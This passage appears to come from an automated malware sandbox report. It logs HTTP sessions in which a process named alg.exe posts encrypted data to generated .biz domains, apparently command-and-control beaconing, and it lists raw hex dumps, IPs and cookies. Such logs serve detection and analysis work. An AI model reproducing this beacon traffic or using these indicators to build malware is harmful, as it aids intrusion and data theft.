                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379697084 CET778OUTData Raw: c6 c7 65 d8 0f 68 4e f9 fe 02 00 00 9a 18 17 72 c3 22 bc 79 e8 fa f3 c8 bf eb f0 1f 29 01 79 a1 54 db 51 ff c6 19 25 49 3b 36 b0 71 d1 ae 56 63 6e 43 03 df 18 57 5d 42 a5 49 c5 2e 70 a5 6b 53 8a 22 55 7e e5 97 ce 86 3a 07 6f 4f d6 02 0f 4e 4a c8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ehNr"y)yTQ%I;6qVcnCW]BI.pkS"U~:oONJ'ss55cB7J]z&QRoXA/poA'{$yR*I,'}hi7d('Rbu9]sov[oGtVw^pcbK3=oC9"T_pN$
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.048280954 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f282b1d75331bfb0b48460f480c9c1f6|155.94.241.187|1731920365|1731920365|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        112192.168.2.105009134.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123914957 CET359OUTPOST /npuxmmvdoacshpp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123929977 CET834OUTData Raw: 9e 86 9a 27 90 d3 84 39 36 03 00 00 f2 e9 16 7b 73 80 24 be b2 74 97 cc 91 e9 a3 7f 9e ce 3b ae 28 93 c8 33 db 84 c4 e6 72 87 a4 77 5e 45 e7 0c e3 28 db e6 72 10 d7 7e 23 4c da 7c f2 00 a1 ac f8 04 e3 a2 52 2e a9 54 bf 32 8b 15 e1 2a eb 26 4c 99
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: '96{s$t;(3rw^E(r~#L|R.T2*&LRx|sc82#IT#S]'8+@'&:1p,[vl(9P3WD=AEEKe#z ` ykF4H|,H%,PzA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.955321074 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8ed96945c854079ec42358e5e45bd579|155.94.241.187|1731920366|1731920366|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        113192.168.2.105009235.164.78.200807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558059931 CET348OUTPOST /xxfg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558084965 CET778OUTData Raw: 36 85 e5 88 47 47 fe 60 fe 02 00 00 95 c6 62 80 8c 6a 3e c4 ed 11 a0 9a 95 e8 01 04 2c f6 1e 9b 3b d7 33 59 3e a2 c7 28 6b 42 e1 a0 ef dd a1 69 ae 41 c4 5c a1 d5 be cd 7c c5 fd f6 0a b4 99 c3 b3 f4 3a 99 fc 35 23 a7 32 a3 90 d8 6e ff b0 d2 1f 1c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6GG`bj>,;3Y>(kBiA\|:5#2nwmmox>o4kOva<6C|xv@2,,(w[&$p#-dy)h({jol((fo }_L^h*oZ
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.396711111 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=edd7bd838c2ca2a3c6a7d48f6cbf7044|155.94.241.187|1731920367|1731920367|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        114192.168.2.105009347.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.975003958 CET358OUTPOST /bhjwcsvylmqgrfwl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.975023985 CET834OUTData Raw: 93 77 45 da cc d8 3f d7 36 03 00 00 f8 32 05 ff 8d 16 46 63 ca ec 77 b5 c2 70 ba 37 b6 e6 d4 22 6d b2 04 2f 46 9d d8 0e d5 17 da 1b fa b2 25 2c 25 9c 77 c8 43 db ee 29 69 b0 1f 5e fa 43 ff ba d4 ef 7d 73 c7 57 62 d3 0f 78 0e 98 5d a3 bb 81 0e f2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wE?62Fcwp7"m/F%,%wC)i^C}sWbx]Oundo5C_@}M9s$R]7)Pd;cK #K7b>OL#b<+GnA76F6^qW I }{X&D^~
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.450325012 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b128078700503dab1bd34149235a8cbd|155.94.241.187|1731920368|1731920368|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        115192.168.2.105009418.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742353916 CET355OUTPOST /kmkkfixobdivq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.742393017 CET778OUTData Raw: a5 43 66 38 7e 26 ae c7 fe 02 00 00 29 df f2 78 44 c3 04 ad 1c 35 b4 a1 cf e3 7c 2e 2e 2b 6b 35 1a c5 31 f6 0b b7 52 6a 3f bf 54 eb 2f bd e1 49 36 d4 33 45 e8 b7 f0 01 5c aa ce 84 19 f9 9f a1 cc 5c 0b f6 73 f2 06 40 9f 2f 9a 37 3f 68 64 50 18 17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Cf8~&)xD5|..+k51Rj?T/I63E\\s@/7?hdPTofL6\FP>416T@M3mr'4yN)oU"13\arK=Hc&U6?I^!bgZ6,_mmBPcYJQ0+F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.193000078 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5dca3e9a935dfb525e7c8a31dce656a3|155.94.241.187|1731920368|1731920368|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        116192.168.2.105009513.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468466043 CET345OUTPOST /fp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.468481064 CET834OUTData Raw: 81 a2 a4 df 18 9b bc cc 36 03 00 00 ef ad a4 7a 6c 6d a8 c4 45 e2 9e ae 30 64 2f 8a 57 a1 be 54 5c a7 70 4f b0 ad 93 df cc cb 7c 28 f3 30 ac 62 5f 44 0c 7b 4a 2f 16 c8 30 8b 65 b5 cb 70 3f 15 90 ab db 9b a5 47 ba 0a 67 95 01 69 cc e2 ad 66 02 69
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6zlmE0d/WT\pO|(0b_D{J/0ep?GgifiFsCQdUqngDRmb#|PFQAv?Yj5:~u_8unwH`WsDm({\S__:[Mu?GoaD8Nn;Hh7GzF^x
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.910023928 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=73727a84d1b81275c451ba5d21a009e6|155.94.241.187|1731920369|1731920369|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        117192.168.2.1050096208.100.26.245807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.379503965 CET354OUTPOST /wpngtwyaa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.379503965 CET778OUTData Raw: ab db 62 bc 4e 69 94 cb fe 02 00 00 e2 43 5b be 36 6d a2 f7 1a 25 91 38 c7 9c 1b 5f 75 0a e9 6c c1 38 ec e1 e9 02 94 cd bf 37 49 87 92 b6 5b 37 66 93 10 cf 4b a2 cb cb c6 64 7c a0 03 18 2d bf 3f 32 26 6b f0 d2 fc e7 12 eb a9 39 61 6a aa 81 85 ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bNiC[6m%8_ul87I[7fKd|-?2&k9ajS:_ks?8"K[ >S`HaDeFtece7X2g1kq<lS^sEgCXxDJD}(mO]-6?X+E-&5<])*>#MQ1Mw
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.024719954 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.224678040 CET348OUTPOST /ijq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.224678040 CET778OUTData Raw: d6 aa 93 99 7a 6d 84 5d fe 02 00 00 d8 58 e2 ae 5d ab d6 f4 fd a9 e7 65 91 60 2d 2f d4 eb c1 ed 74 d1 d7 1b 62 9c c2 96 cf 10 96 94 fe 05 df 5a 47 ce be 09 a5 52 de 78 0c f7 b4 8d 59 89 02 f3 29 a0 b5 f7 13 b7 64 38 fa 30 47 45 a6 35 cc 8e d9 a9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zm]X]e`-/tbZGRxY)d80GE5<>Uii.P(N#vG#E$cT$J}NX>bVR>YJ}V&_9:z ,B&.hkJMAbx2&wAZJWU&
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.371562958 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        118192.168.2.105009734.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.986210108 CET350OUTPOST /aglvdwcnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.986228943 CET834OUTData Raw: d8 5a 08 cf b7 35 48 d7 36 03 00 00 dd 77 ef 64 7d 6e 75 fd 6d 36 82 d7 3b 14 01 56 7f 05 bf fc f2 2a 1b 54 0b 95 c8 78 7c 3f 1e 27 f8 d2 60 1f 9c 25 96 1e 4c 76 90 b1 ed c4 74 0d 75 e0 84 2c 0d d1 cd 42 72 33 a5 e0 13 10 ad 46 ef ad 2e f7 31 27
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Z5H6wd}num6;V*Tx|?'`%Lvtu,Br3F.1'AQ(H47<8+5B-*5=ww@xZ{7KnSs[5I5>8Q bW3:-3,O=:^,]~0hO8a VM"7&Y`r@O=hcQ<
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.829483986 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8348a08df58ce3e1588a767a6c71a1c3|155.94.241.187|1731920370|1731920370|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        119192.168.2.105009844.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827760935 CET352OUTPOST /arqdlqnxd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
